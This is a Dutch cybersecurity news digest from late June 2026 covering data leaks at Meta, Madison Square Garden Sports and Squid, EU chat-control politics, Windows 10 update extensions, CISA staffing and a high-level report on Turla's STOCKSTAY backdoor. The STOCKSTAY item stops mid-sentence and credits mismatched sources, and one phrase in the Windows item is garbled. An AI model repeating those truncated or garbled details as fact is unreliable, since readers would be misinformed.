24 juni 2026 | Meta lekte gevoelige toetsaanslagen personeel verzameld voor AI-training

Meta heeft gevoelige toetsaanslagen, muisbewegingen en andere informatie van personeel gelekt die waren verzameld voor de training van modellen met kunstmatige intelligentie (AI). Dit nieuws werd gemeld door Wired, gebaseerd op een interne memo en verklaringen van drie medewerkers, en is inmiddels bevestigd door het techbedrijf zelf.

Vorige maand kondigde Meta aan dat het nieuwe trackingsoftware zou installeren op de systemen van Amerikaanse medewerkers. Deze software was bedoeld om muisbewegingen, clicks en toetsaanslagen op te slaan en te gebruiken voor de training van AI modellen. De plannen stuitten op kritiek van medewerkers.

Begin deze maand reageerde Meta in een interne memo op deze kritiek. Het bedrijf stelde vertrouwen te hebben in de privacymaatregelen van het systeem en erkende de zorgen van werknemers over persoonlijke data op werkapparatuur. Ook werd aangegeven dat men meer controle wilde over het moment waarop de dataverzameling plaatsvond. Als tegemoetkoming konden medewerkers van Meta de dataverzameling maximaal dertig minuten per keer pauzeren en verzoeken indienen om te worden uitgezonderd.

Nu is echter gebleken dat de verzamelde toetsaanslagen, clicks, op het scherm weergegeven content en andere informatie, die via het programma werden verzameld, toegankelijk waren voor alle medewerkers van Meta. Deze informatie omvatte onder andere volledige prompts, uitgewerkte gespreksverslagen, privégesprekken en beoordelingen van personeel. Naar aanleiding van dit incident heeft Meta besloten om het trackingprogramma voor onbepaalde tijd op te schorten. Verdere details over de exacte omvang of aard van het incident zijn niet openbaar gemaakt.

 

Bron: Meta

25 juni 2026 | President Europees Parlement wil 'chatcontrole' doordrukken ondanks tegenstem

De president van het Europees Parlement, Roberta Metsola, zet druk op een voorstel voor de invoering van 'chatcontrole', ondanks herhaaldelijke afwijzing door het Parlement. Diplomaten spreken van een "ongekende" actie van Metsola, zo meldt Politico op basis van een intern document. De discussie volgt op het verlopen van 'chatcontrole 1.0' begin april, een tijdelijke Europese uitzondering die technologiebedrijven toestond om chatberichten en 'interpersoonlijke communicatie' van gebruikers op vrijwillige basis massaal te scannen.

Onderhandelingen tussen het Europees Parlement en de EU-lidstaten over een verlenging van deze maatregel liepen eerder op niets uit. Als gevolg hiervan is het technologiebedrijven momenteel niet meer toegestaan het verkeer van hun gebruikers op deze manier te scannen. Grote technologiebedrijven zoals Google, Meta, Microsoft en Snap hebben in reactie hierop de Europese beleidsmakers opgeroepen de maatregel alsnog te verlengen. Ze hebben aangegeven in de tussentijd "vrijwillige actie" te blijven ondernemen op de betreffende interpersoonlijke communicatiediensten, hoewel de exacte aard en de omvang van deze acties niet zijn gespecificeerd.

Politico meldt nu dat Metsola de EU-lidstaten heeft verzocht het voorstel voor het scannen van verkeer goed te keuren, een voorstel dat het Europees Parlement al twee keer eerder heeft verworpen. Deze stap wordt door diplomaten als "ongekend" omschreven. Medewerkers van het Parlement die met Politico spraken, uiten hun gevoel gepasseerd te zijn, nu de president de lidstaten uitnodigt om een voorstel aan te nemen dat reeds door het Parlement is afgewezen. Binnen het Europees Parlement bestaan zorgen dat deze actie de onderhandelingspositie van het Parlement aantast, met name als het gaat om voorstellen betreffende de aanpak van misbruikmateriaal.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

25 juni 2026 | Madison Square Garden Sports getroffen door ShinyHunters 'pay or leak' campagne

De sport- en entertainmentorganisatie Madison Square Garden Sports is in juni 2026 het doelwit geweest van een 'pay or leak'-afpersingscampagne door de cybercriminele groep ShinyHunters. De groep heeft later de vermeende gestolen gegevens gepubliceerd. Het datalek omvat bijna 10 miljoen unieke e-mailadressen van zowel medewerkers als klanten, naast uitgebreide persoonlijke informatie, werkgerelateerde gegevens en klantrelatie-informatie.

De gecompromitteerde data omvatten specifiek klantenservicegegevens, e-mailadressen, namen, telefoonnummers en fysieke adressen. Het incident is op 24 juni 2026 toegevoegd aan de Have I Been Pwned (HIBP) database, een dienst die controleert of iemands gegevens zijn gelekt bij datalekken.

In reactie op dergelijke incidenten wordt geadviseerd om onmiddellijk wachtwoorden te wijzigen die mogelijk zijn getroffen door dit datalek, en dit te doen voor elk account waarop hetzelfde wachtwoord werd gebruikt. Daarnaast wordt aangeraden om twee-factor authenticatie (2FA) in te schakelen op alle plekken waar dit wordt ondersteund, om zo een extra beveiligingslaag toe te voegen aan accounts. Het gebruik van een wachtwoordbeheerder wordt ook aanbevolen om sterke, unieke wachtwoorden te genereren en veilig op te slaan.

Voor Nederlanders adviseert Veiliginternetten.nl, een samenwerking van publieke en private organisaties, over online veiligheid en biedt basistips om de online veiligheid te waarborgen. Dit onderstreept de potentiële impact van dit internationale datalek op gebruikers wereldwijd, waaronder mogelijk ook in Nederland en België.

 

Bron: Have I Been Pwned | Bron 2: 404media.co | Bron 3: veiliginternetten.nl

25 juni 2026 | Tweede Kamer debatteert over datalekken en bescherming persoonsgegevens

De Commissie voor Digitale Zaken van de Tweede Kamer debatteert vandaag met staatssecretarissen Eric van der Burg van Binnenlandse Zaken en Ingrid van Bruggen van Justitie en Veiligheid. Centraal in het debat staat de bescherming van persoonsgegevens en de aanpak van grote datalekken, een onderwerp dat aan urgentie heeft gewonnen door recente incidenten.

Aanleiding voor het debat zijn onder andere datalekken die plaatsvonden bij diverse instanties en organisaties in Nederland. Specifiek worden hierbij de Autoriteit Persoonsgegevens (AP), de Raad voor de rechtspraak en de gemeente Epe genoemd. Bij deze lekken speelde onder meer een misbruikte kwetsbaarheid in Ivanti Endpoint Manager Mobile (EPMM) een rol, wat eveneens op de agenda staat.

Een ander belangrijk agendapunt is een onderzoek van het Wetenschappelijk Onderzoek- en Datacentrum (WODC) naar gegevensbescherming binnen openbare registers. De Tweede Kamer meldt in de aankondiging van het debat dat de toenemende toegankelijkheid van informatie een spanning heeft gecreëerd tussen de openbaarheid van deze registers en het recht op gegevensbescherming. Zowel beheerders van deze registers als de Autoriteit Persoonsgegevens uiten hun zorgen over het risico van misbruik van persoonlijke gegevens, bijvoorbeeld voor identiteitsfraude of het intimideren van personen.

Daarnaast zal het functioneren van de Autoriteit Persoonsgegevens ter sprake komen. Eerder uitte voormalig staatssecretaris Struycken van Justitie en Veiligheid kritiek op een evaluatierapport over de toezichthouder. Hij stelde dat het rapport onvoldoende inzicht bood in het doelmatig en doeltreffend functioneren van de AP, inclusief efficiëntieverbetering, effectief gebruik van middelen en risicobeheersing. Struycken merkte op dat het ontbreken van een meetinstrument en concrete 'outcomeindicatoren' het moeilijk maakte om de prestaties van de AP adequaat te meten in de betreffende periode. Het commissiedebat is live te volgen en zal later ook beschikbaar zijn om terug te kijken.

 

Bron: Tweede Kamer

26 juni 2026 | Microsoft verlengt beveiligingsupdates voor Windows 10 consumenten tot oktober 2027

Microsoft heeft het programma voor Extended Security Updates (ESU) voor Windows 10 stilletjes uitgebreid. Hierdoor kunnen consumenten tot 12 oktober 2027 kritieke beveiligingspatches ontvangen, wat een extra jaar is boven de oorspronkelijke einddatum van 12 oktober 2026.

Windows 10 bereikte officieel zijn einde van ondersteuning op 14 oktober 2025. Dit liet miljoenen gebruikers wereldwijd blootstaan aan potentiële kwetsbaarheden zonder beveiligingspatches. Om de overgang naar Windows 11 te vergemakkelijken, had Microsoft aanvankelijk het consumenten ESU-programma gelanceerd om een beveiligingsbrug van één jaar te bieden tot oktober 2026. Omdat een groot deel van het gebruikersbestand nog niet is gemigreerd, heeft Microsoft nu stilzwijgend de ESU-programmapagina bijgewerkt om de dekking met een extra volledig jaar te verlengen. Gebruikers die al zijn ingeschreven, hoeven geen actie te ondernemen; hun dekking wordt automatisch voortgezet tot de nieuwe einddatum.

Het Extended Security Updates-programma voorziet ingeschreven Windows 10-apparaten van kritieke en belangrijke beveiligingsupdates, zoals geclassificeerd door het Microsoft Security Response Center (MSRC). Het programma dekt uitsluitend Windows 10, versie 22H2, inclusief de Home-, Professional-, Pro Education- en Workstations-edities. Belangrijk is dat de ESU-inschrijving geen feature-updates, productverbeteringen of toegang tot technische ondersteuning omvat. Het enige doel is om de blootstelling aan malware en cyberaanvallen tijdens de overgangsperiode te verminderen.

Om in aanmerking te komen voor het consumenten ESU-programma, moeten apparaten aan de volgende vereisten voldoen: ze moeten draaien op Windows 10, versie 22H2 (Home, Pro, Pro Education of Workstations-editie), de nieuwste updates voor Windows geïnstalleerd hebben vóór inschrijving, en het Microsoft account dat wordt gebruikt om in te loggen moet beheerdersrechten hebben. Het Microsoft account mag geen kinderaccount zijn. Apparaten in kioskmodus, die zijn gekoppeld aan een Active Directory-domein, of die zijn ingeschreven in een Mobile Device Management (MDM)-oplossing, komen niet in aanmerking voor het consumenten ESU-programma.

Microsoft biedt drie inschrijvingsniveaus voor het consumenten ESU-programma: gratis voor gebruikers die PC Settings Sync (Windows Backup) hebben ingeschakeld, 1.000 Microsoft Rewards-punten die kunnen worden ingewisseld voor inschrijving, of 30 USD (eenmalige aankoop, plus toepasselijke lokale belastingen) voor gebruikers zonder Rewards-punten of synchronisatie ingeschakeld. Eén ESU-licentie kan worden toegepast op maximaal 10 apparaten onder hetzelfde Microsoft account, wat het een kosteneffectieve optie maakt voor huishoudens met meerdere Windows 10-machines.

Inschrijven is eenvoudig: navigeer naar Instellingen > Update en Beveiliging > Windows Update. Als het apparaat aan alle vereisten voldoet, verschijnt er een "Nu inschrijven"-optie onder de melding voor het einde van de ondersteuning. Gebruikers die inloggen met een lokaal account, worden gevraagd om te authenticeren met hun Microsoft account om de inschrijving te voltooien.

Beveiligingsprofessionals en IT-beheerders moeten deze verlenging behandelen als een tijdelijke risicobeperkende maatregel, niet als een permanente oplossing. Niet-ingeschreven apparaten met Windows 10 blijven zeer kwetsbaar voor exploits, ransomware en zero-aanvallen met day zonder actieve patchdekking. Organisaties die implementaties in bedrijven beheren, moeten de commerciële ESU-route evalueren of de migratieplanning naar Windows 11 versnellen om oplopende technische schuld en beveiligingsrisico's te voorkomen.

 

Bron: Microsoft

26 juni 2026 | CISA zoekt 600 nieuwe medewerkers en wacht op bevestiging directeur

De Amerikaanse Cybersecurity and Infrastructure Security Agency (CISA) is van plan om ongeveer 600 nieuwe medewerkers aan te nemen, zodra een nieuwe, door de Senaat bevestigde directeur is benoemd. Dit heeft Homeland Security Secretaris Markwayne Mullin verklaard tijdens een hoorzitting van de House Appropriations Committee subcommittee op donderdag. Sinds januari 2025 functioneert CISA zonder een permanent hoofd, wat volgens Mullin de effectiviteit van de organisatie belemmert.

Mullin benadrukte de urgentie van de situatie en stelde dat de president al een ontmoeting heeft gehad met een potentiële kandidaat voor de directeursfunctie. Hoewel hij de naam van de beoogde directeur niet noemde, wordt Shyam Sankar, de chief technology officer van Palantir Technologies, gezien als een waarschijnlijke genomineerde, hoewel het Witte Huis eerder aangaf dat hij "op dit moment" geen topkandidaat was.

De behoefte aan nieuw personeel komt na eerdere ontslagen bij CISA, waarbij ongeveer een derde van het personeelsbestand, naar verluidt zo'n 1.000 medewerkers, de organisatie verliet als gevolg van een focus van de regering op het inkrimpen van de federale overheid. Democraten hebben gewaarschuwd dat deze bezuinigingen de capaciteit van CISA om te communiceren met deelstaatregeringen en de private sector hebben geschaad.

Volgens Mullin is het niet noodzakelijk om alle verloren medewerkers terug te nemen, maar is het cruciaal om "getalenteerde individuen die weten wat ze doen en partnerschappen hebben met staats- en lokale functionarissen" aan te trekken. De waarnemend directeur, Nick Andersen, heeft al aangegeven dat CISA is begonnen met het aannemen van ongeveer 300 nieuwe mensen in de komende maanden. Mullin verwacht dat het ongeveer een jaar zal duren om CISA weer volledig op te bouwen, hoewel hij gelooft dat "aanzienlijke vooruitgang in de eerste drie maanden" mogelijk is.

Daarnaast uitte Mullin zijn bezorgdheid over de cyberbeveiligings- en gegevensprivacyrisico's vanuit China. Hij stelde dat China dagelijks probeert in te breken in Amerikaanse systemen, en dat CISA hierin een cruciale rol moet spelen, aangezien bedrijven zoals Meta of Google dit niet alleen kunnen aanpakken. Mullin gaf aan dat er meer duidelijkheid van het Congres nodig is over de bevoegdheden van CISA. Ook sprak hij over de investeringen van het ministerie in technologie voor de verdediging tegen drones, een prioriteit voor hem. Het ministerie richt zich op de aanschaf van geavanceerde technologie, inclusief uitgebreide bewakingstools, waarbij kunstmatige intelligentie (AI) wordt gezien als een "game changer" en "force multiplier".

 

Bron: recordedfuture.com

26 juni 2026 | Clouddiensten Amazon en Microsoft voorlopig aangewezen als DMA-poortwachters

De Europese Commissie heeft recentelijk een voorlopig standpunt ingenomen waarin de clouddiensten van Amazon en Microsoft worden bestempeld als 'poortwachters' in het kader van de Digital Markets Act (DMA). Deze belangrijke stap betekent dat specifieke diensten, waaronder Microsoft Azure en Amazon Web Services, mogelijk onderworpen zullen worden aan een reeks strenge regels die zijn ontworpen om eerlijke concurrentie en openheid op de digitale markten te bevorderen. De techbedrijven hebben nu de gelegenheid om zich tegen deze voorlopige bevindingen te verweren, voordat de Europese Commissie een definitief besluit neemt.

De aanwijzing als poortwachter impliceert dat deze bedrijven een significante invloed uitoefenen op de digitale economie, fungerend als een cruciale toegangspoort tussen een groot aantal bedrijven en hun eindgebruikers. De Autoriteit Consument & Markt (ACM) onderstreept deze positie door te stellen dat Microsoft Azure en Amazon Web Services de twee grootste clouddiensten binnen de Europese Unie zijn. Dit standpunt is het resultaat van een gezamenlijk onderzoek dat de Nederlandse toezichthouder, de ACM, heeft uitgevoerd in samenwerking met de Europese Commissie. Uit dit onderzoek bleek dat de omvang en het bereik van deze clouddiensten hen een dominante positie geven die speciale regulering rechtvaardigt.

De DMA stelt diverse verplichtingen aan aangewezen poortwachters. Een van de kernprincipes is het verbod op zelfbevoordeling, wat inhoudt dat de poortwachters hun eigen diensten geen voorkeursbehandeling mogen geven ten opzichte van concurrerende diensten die door derden worden aangeboden op hun platformen. Dit moet voorkomen dat de dominante positie van de poortwachters wordt misbruikt om concurrenten te benadelen.

Daarnaast omvat de DMA verplichtingen met betrekking tot het faciliteren van overstapmogelijkheden voor afnemers. Dit betekent dat bedrijven die gebruikmaken van deze clouddiensten gemakkelijker moeten kunnen overstappen naar een andere aanbieder, zonder onnodige belemmeringen. Een gerelateerde eis is de verplichting tot data-portabiliteit, waarbij de uitwisseling van gegevens tussen verschillende systemen en diensten mogelijk moet worden gemaakt. Deze maatregelen zijn essentieel om vendor lock-in te verminderen en de keuzevrijheid voor gebruikers te vergroten.

Het is niet de eerste keer dat diensten van Amazon en Microsoft onder de loep worden genomen door Brussel; eerder zijn al andere diensten van deze bedrijven aangewezen als poortwachters onder de DMA. Deze voortdurende focus op grote techbedrijven toont de vastberadenheid van de Europese Unie om een eerlijkere en transparantere digitale markt te creëren, wat indirect ook impact heeft op de cybersecuritypraktijken en -vereisten voor bedrijven die van deze platforms afhankelijk zijn.

 

Bron: Europese Commissie | Bron 2: ec.europa.eu

26 juni 2026 | Kabinet wil DigiD op soevereine overheidscloud

Het kabinet heeft een duidelijke voorkeur uitgesproken voor het gebruik van een soevereine overheidscloud voor de digitale identiteitsdienst DigiD op de lange termijn. Dit standpunt werd kenbaar gemaakt door staatssecretaris Van der Burg van Binnenlandse Zaken, in reactie op Kamervragen die gesteld waren door JA21. De vragen van Kamerlid Van den Berg richtten zich op cruciale aspecten zoals digitale soevereiniteit, de vitale digitale overheidsinfrastructuur en de bestaande afhankelijkheden rondom DigiD, inclusief de relaties met leveranciers als Solvinity en Kyndryl.

Kamerlid Van den Berg wilde specifiek weten wat het uiteindelijke doel van het kabinet is met betrekking tot de toekomstige inrichting van DigiD. De vragen betroffen onder meer de strategie ten aanzien van technologie, de keuze van leveranciers, de mate van Europese of Nederlandse zeggenschap, en de mogelijkheid van publiek beheer, dan wel een combinatie van deze factoren. De staatssecretaris bevestigde in zijn antwoord dat de voorkeur expliciet uitgaat naar het gebruik van de soevereine overheidscloud voor de levering van het platform, de infrastructuur en de datacenters die DigiD ondersteunen.

De rol van digitale soevereiniteit is hierbij van groot belang voor de toekomstige inrichting van DigiD. De staatssecretaris benadrukte dat deze keuze concrete risico’s voor de nationale veiligheid moet verminderen. Daarom zullen toekomstige aanbestedingen plaatsvinden op basis van de Aanbestedingswet Defensie en Veiligheid (ADV). Deze wet biedt ruimere mogelijkheden dan een reguliere Europese aanbesteding om risico’s die de nationale veiligheid kunnen bedreigen, te beperken. Logius, de organisatie die verantwoordelijk is voor de ontwikkeling van DigiD, is op dit moment bezig met de voorbereidingen voor het uitvoeren van deze aanbestedingstrajecten.

Een andere vraag van het JA21-Kamerlid betrof de unieke en kritieke rol van DigiD, en of deze dienst moeilijk één-op-één vergelijkbaar is met generieke cloud-, hosting- of authenticatiediensten. De staatssecretaris beaamde dat de technische inrichting van DigiD maatwerk is. Het is essentieel dat de partij die DigiD beheert, beschikt over diepgaande kennis van en ruime ervaring met het platform om de Logius-voorzieningen, waaronder DigiD, goed te laten functioneren. Om een soepele overgang te garanderen bij de keuze voor een nieuwe beheerpartij, zal rekening worden gehouden met een overdrachtsperiode van zes tot twaalf maanden. Deze strategische koers benadrukt de prioriteit die de Nederlandse overheid geeft aan de controle en veiligheid van haar meest essentiële digitale diensten.

 

Bron: Tweede Kamer

26 juni 2026 | Nederlandse mbo instellingen starten pool voor cyberweerbaarheid

Nederlandse mbo instellingen gaan een gezamenlijke pool voor cyberweerbaarheid opzetten om elkaar te ondersteunen bij cyberaanvallen. Dit initiatief, dat naar verwachting in oktober 2027 van start gaat, is een reactie op de toenemende cyberdreiging. Minister Letschert heeft haar steun uitgesproken voor de ontwikkeling en is van plan de afspraken over deze pool op te nemen in de bestuurlijke overeenkomsten voor na 2027.

De minister benadrukt in een brief aan de Tweede Kamer dat mbo instellingen hun gezamenlijke inzet op het gebied van cyberveiligheid moeten voortzetten vanuit zelfregulering. De pool is bedoeld om hier concrete invulling aan te geven en voort te bouwen op de activiteiten van het huidige programma. Binnen de pool zullen de instellingen afspraken maken over hun inzet en resultaten met betrekking tot cyberveiligheid. Daarnaast worden er centraal voorzieningen ingericht ter ondersteuning van alle mbo instellingen.

Een essentieel onderdeel van de pool is de wederzijdse ondersteuning bij een hack. Mocht een mbo instelling slachtoffer worden van een cyberaanval, dan zullen de andere instellingen hulp bieden. Deze ondersteuning kan, indien noodzakelijk en op basis van heldere spelregels, ook financieel van aard zijn. Minister Letschert ziet in de pool een middel om meerdere doelen te dienen: alle instellingen committeren zich aan duidelijke ambities, verantwoorden zich naar elkaar op basis van scherpe afspraken, richten gezamenlijk diensten en voorzieningen in, en staan voor elkaar klaar wanneer dat nodig is.

MBO Digitaal, een platform van de MBO Raad, stelt dat de komst van de pool strikte weerbaarheidseisen met zich meebrengt voor de onderwijsinstellingen. Deze eisen zijn niet alleen bedoeld om elkaar garanties te bieden, maar dienen vooral als een sterke stimulans om gezamenlijk te groeien in cyberweerbaarheid. Het platform heeft de afgelopen anderhalf jaar ingezet op het ondersteunen van instellingen via het programma Cyberveiligheid en heeft nu een roadmap opgesteld om scholen te helpen voldoen aan de eisen van de pool.

MBO Digitaal benadrukt dat de cyberweerbaarheidspool een logische vervolgstap is, waarbij de samenwerking binnen het mbo een cruciaal uitgangspunt vormt. De mbo instellingen nemen hiermee concreet verantwoordelijkheid voor elkaar. Dit creëert een gedeeld belang om te leren, te verbeteren en elkaar scherp te houden, wat de sector als geheel helpt te groeien in volwassenheid op het gebied van cybersecurity.

 

Bron: Tweede Kamer

26 juni 2026 | Belgische politie: lage aangiftebereidheid hindert aanpak cybercrime

De Belgische Federale Politie benadrukt dat cybercriminaliteit een aanzienlijke uitdaging vormt, voornamelijk omdat een beperkt aantal slachtoffers aangifte doet. Deze bevinding werd gepresenteerd tijdens de onthulling van de Criminaliteitsstatistieken 2025. Vorig jaar werden meer dan 73.000 gevallen van cybercriminaliteit geregistreerd, wat neerkomt op een stijging van bijna zesduizend incidenten vergeleken met het voorgaande jaar.

Met name het aantal phishing-gevallen kende een forse toename van dertig procent ten opzichte van 2024. In 2025 werden ongeveer 11.300 phishing-incidenten geregistreerd, terwijl dit een jaar eerder nog ruim 8.600 betrof. De politie merkt op dat de lage aangiftebereidheid de aanpak van dit soort misdrijven bemoeilijkt. Volgens de Veiligheidsmonitor doet slechts 21 procent van de slachtoffers van voltooide phishing-feiten aangifte, en dit percentage daalt naar slechts 4 procent bij pogingen tot phishing.

Ondanks dat sommige burgers de noodzaak van aangifte niet inzien, blijft het volgens de Belgische politie essentieel om melding te doen van cybercriminaliteit. De organisatie is bezig met een verdere specialisatie in de bestrijding van cybercriminaliteit, onder meer door de werving van hoofdinspecteurs die gespecialiseerd zijn in cyberveiligheid. Dit moet de capaciteit vergroten om de groeiende dreiging effectief aan te pakken.

 

Bron: Belgische Federale Politie | Bron 2: my.police.be

26 juni 2026 | Cybercrimefora XSS en DarkForums opnieuw gedwongen van domein te wisselen

Twee vooraanstaande cybercrimefora, XSS en DarkForums, hebben recentelijk opnieuw hun internetdomein moeten wijzigen. Deze aanhoudende noodzaak tot verandering duidt op de blijvende druk die het forumlandschap ondervindt, met name sinds de intensivering van internationale opsporingsacties in 2025.

Het Russischtalige forum XSS, dat bekendstaat als een van de oudste platforms voor de handel in gestolen data, illegale toegang en malware, verloor in juli 2025 zijn oorspronkelijke domein xss.is. Dit verlies volgde op een opsporingsoperatie waarbij een vermoedelijke beheerder werd aangehouden. Het forum verscheen later weer op het clearnet via het domein xss.ac, dat in maart 2026 werd geregistreerd. Echter, dit domein lijkt nu de status 'clientHold' bij de registrar te hebben gekregen, wat doorgaans wijst op een schorsing. De nameservers van dit domein maken gebruik van een dienst voor DDoS-bescherming.

Gelijktijdig heeft DarkForums, een ander prominent cybercrimeforum, een overstap gemaakt naar een nieuw clearnet domein met de .ru-extensie. DarkForums groeide aanzienlijk na de ineenstorting van het grote forum BreachForums in 2025 en heeft sindsdien al diverse keren van domein gewisseld, nadat eerdere adressen, waaronder die met de extensies .ac en .su, eveneens werden geschorst.

Deze frequente domeinwisselingen passen in een breder patroon van instabiliteit binnen de cybercrimegemeenschap. Sinds de opsporingsdiensten in 2025 krachtig optraden tegen dergelijke fora, blijven de resterende platforms kwetsbaar en genoodzaakt om regelmatig nieuwe digitale onderkomens te zoeken. Voor cybersecurityverdedigers betekent dit dat de infrastructuur waar gestolen gegevens en toegang worden verhandeld, complexer wordt om te monitoren. Tegelijkertijd toont het aan dat de aanhoudende druk de criminele markt effectief blijft verstoren.

 

Bron: Cybercrimeinfo

27 juni 2026 | Activist waarschuwt voor 'dubbele Europese aanval' op veilige chatapps

Voormalig Europarlementariër en mensenrechtenactivist Patrick Breyer heeft gewaarschuwd voor een "dubbele Europese aanval" op veilige chatapps, die deze week plaatsvindt en een directe bedreiging vormt voor privécommunicatie. Volgens Breyer staan zowel "chatcontrole 1.0" als "chatcontrole 2.0" op de agenda van belangrijke overleggen, wat kan leiden tot een scenario van het ergste geval voor digitale privacy.

"Chatcontrole 1.0" betrof een tijdelijke Europese uitzondering die techbedrijven de mogelijkheid gaf om chatberichten en andere interpersoonlijke communicatie van gebruikers op vrijwillige basis massaal te scannen. Deze uitzondering is afgelopen april verlopen, nadat de Europese Commissie, de lidstaten en het Europees Parlement geen overeenstemming konden bereiken over een permanent voorstel. Het Europees Parlement had het oorspronkelijke voorstel twee keer verworpen.

Het concept van "chatcontrole 2.0" komt voort uit een oorspronkelijk plan van de Europese Commissie, dat chatapps en andere aanbieders zou verplichten om de inhoud van gebruikers te controleren. Ook dit voorstel kon destijds niet rekenen op voldoende steun. De huidige EU-voorzitter, Cyprus, heeft nu echter een nieuw compromisvoorstel voor chatcontrole ingediend. Hierover wordt momenteel onderhandeld door de Europese Commissie, de Raad en het Europees Parlement.

Eerder deze week bracht Politico naar buiten dat de president van het Europees Parlement, Roberta Metsola, van plan is het voorstel voor chatcontrole 1.0 door te drukken, ondanks de eerdere en herhaalde tegenstemmen van het Parlement. Breyer spreekt van een "flagrante minachting voor democratische processen en fundamentele rechten". Hij bestempelt Metsola's actie om het systeem voor massasurveillance nieuw leven in te blazen en daarmee tegen de wil van het Parlement in te gaan, als ongekend.

Daarnaast zal het Europees Parlement aankomende maandagochtend een nieuw mandaat aannemen voor de onderhandelingen over chatcontrole 2.0, die later die dag zullen plaatsvinden. Breyer vreest dat deze onderhandelingen zullen leiden tot "verschrikkelijke concessies". Hij benadrukt dat er sprake is van een "dubbele aanval op de privacy van digitale communicatie" en roept op om te voorkomen dat "ondemocratische geheime deals" de veiligheid en vertrouwelijkheid van het digitale leven ondermijnen.

In dit debat meldde Netzpolitik.org eerder deze week dat het aflopen van chatcontrole 1.0 niet heeft geresulteerd in een daling van het aantal meldingen van misbruikmateriaal, zoals voorstanders van de maatregel eerder beweerden.

 

Bron: nrgovernance.nl

27 juni 2026 | Google reCAPTCHA introduceert verificatie met handgebaren tegen geavanceerde bots

Google breidt zijn reCAPTCHA-technologie uit met een nieuwe verificatiemethode, waarbij gebruikers eenvoudige handgebaren voor hun camera moeten uitvoeren om te bewijzen dat ze geen robot zijn. Deze functie is ontworpen als een extra beschermingslaag tegen steeds geavanceerdere bots en systemen met kunstmatige intelligentie die traditionele CAPTCHA-uitdagingen steeds beter kunnen omzeilen.

Wanneer de functie is ingeschakeld, vraagt reCAPTCHA om toestemming voor toegang tot de camera van de gebruiker. Vervolgens neemt het systeem een korte video op van de hand van de gebruiker terwijl deze een of meerdere gebaren uitvoert. Google heeft verklaard dat het systeem uitsluitend de bewegingen en de positie van de handpunten analyseert. Het bedrijf benadrukt dat de videobeelden niet gekoppeld worden aan de identiteit van de gebruiker, er geen audio wordt opgenomen en de video’s na een succesvolle verificatie direct worden verwijderd.

Google heeft aangegeven dat de handgebarencontrole een optionele functie is. Gebruikers die deze uitdaging niet kunnen uitvoeren, bijvoorbeeld vanwege toegankelijkheidsredenen, kunnen blijven gebruikmaken van de bestaande visuele of audiouitdagingen. Het bedrijf werkt naar eigen zeggen ook aan verdere verbeteringen op het gebied van toegankelijkheid voor al zijn verificatiemethoden.

De introductie van deze nieuwe verificatiemethode volgt op eerdere aanpassingen binnen reCAPTCHA. Google is voortdurend op zoek naar innovatieve manieren om menselijke gebruikers te onderscheiden van geautomatiseerde systemen, vooral nu modellen met kunstmatige intelligentie steeds beter worden in het oplossen van traditionele beeldpuzzels en andere vormen van verificatietests. Deze ontwikkeling onderstreept de voortdurende strijd tussen cyberbeveiliging en de evoluerende capaciteiten van kwaadaardige geautomatiseerde systemen.

 

Bron: Heise

27 juni 2026 | Google onthult nieuwe STOCKSTAY-backdoor van Turla, ook in Nederland waargenomen

De Google Threat Intelligence Group (GTIG) heeft details vrijgegeven over STOCKSTAY, een nieuwe Windows backdoor van de hackersgroep Turla, gebruikt in spionageaanvallen tegen Oekraïne. De malware, waarvan de ontwikkeling teruggaat tot december 2022, vertoont aanzienlijke code- en functionele overeenkomsten met Kazuar, een ander Turla-implantaat dat sinds 2017 actief is.

STOCKSTAY is een complex, uit meerdere componenten bestaand .NET-programma, gebouwd met het Windows Forms framework. De communicatie met de command-and-control (C2) server vindt plaats via een beveiligde WebSocket verbinding, gebruikmakend van de open source bibliotheek websocket-sharp. Interne communicatie tussen componenten verloopt via een communicatiekanaal tussen processen (IPC), gebaseerd op WM_COPYDATA berichten.

Oorspronkelijk vermomd als een tool voor het bekijken van beursgegevens, doet STOCKSTAY zich nu voor als onschuldige programma's zoals PDF-viewers of rekenhulpprogramma's. Het begint met de downloader STOCKSTAY.MARKETMAKER, die drie modules installeert: STOCKSTAY.STOCKBROKER, een proxy bewuste tunneler voor netwerkcommunicatie; STOCKSTAY.STOCKTRADER, de

 

Bron: Microsoft | Bron 2: github.com

29 juni 2026 | Datalek bij navigatiesoftware Squid, Nederlandse en Belgische zeilers getroffen

De maker van de zeilnavigatiesoftware Squid heeft haar gebruikers per e-mail geïnformeerd over een recent datalek. Onbevoegden hebben mogelijk toegang verkregen tot accountgegevens op de website squid-sailing.com. De wachtwoorden van gebruikers stonden weliswaar versleuteld opgeslagen, wat de directe impact van het datalek op wachtwoorden beperkt.

Als reactie op het incident heeft Squid de betreffende website offline gehaald voor onderhoud en verdere beveiligingsmaatregelen. De mobiele applicaties die bij de software horen, functioneren echter nog wel. Het bedrijf adviseert gebruikers dringend om waakzaam te zijn voor phishing aanvallen en om, indien hetzelfde wachtwoord elders wordt gebruikt, dit onmiddellijk te wijzigen op andere diensten.

Squid versnelt de uitrol van een volledig nieuwe website, die zal draaien op een vernieuwde en veilige infrastructuur. Na de lancering van deze nieuwe website zullen gebruikers per e-mail worden uitgenodigd om hun account opnieuw te activeren. Dit datalek is bijzonder relevant voor de Nederlandse en Belgische zeilgemeenschap, aangezien veel zeilers in deze landen gebruikmaken van de Squid software voor navigatie. De informatie over het datalek is gemeld door het zeilmedium ClubRacer.be.

 

Bron: ClubRacer.be

30 juni 2026 | Minister: nog geen besluit over structureel gebruik Microsoft Copilot bij UWV

De Nederlandse minister Vijlbrief van Sociale Zaken heeft laten weten dat er nog geen definitief besluit is genomen over het structureel gebruik van Microsoft Copilot bij het Uitvoeringsinstituut Werknemersverzekeringen (UWV). Een lopende test met de chatbot verwerkt op dit moment geen persoonsgegevens. Deze mededeling volgt op Kamervragen over de recente beslissing van het UWV om over te stappen van de chatbot Mistral naar Microsoft Copilot.

Vorig jaar mei kondigde het UWV aan dat medewerkers op hun werkplek toegang hadden tot Le Chat, de chatbot van Mistral. Begin mei van dit jaar werd echter bekend dat het UWV niet verder zou gaan met Le Chat en in plaats daarvan had gekozen voor Microsoft Copilot Chat Web. Deze oplossing draait binnen de bestaande omgeving van Microsoft van het UWV en betreft een pilot die tot het einde van het jaar loopt.

Kamerleden El Boujdaini en Neijenhuis van D66 vroegen de minister om opheldering over de risico's die de keuze voor Microsoft Copilot met zich meebrengt, in het bijzonder met betrekking tot de toegang tot persoonsgegevens, mogelijke vendor lock-in en geopolitieke afhankelijkheden. Minister Vijlbrief benoemde drie relevante risico’s.

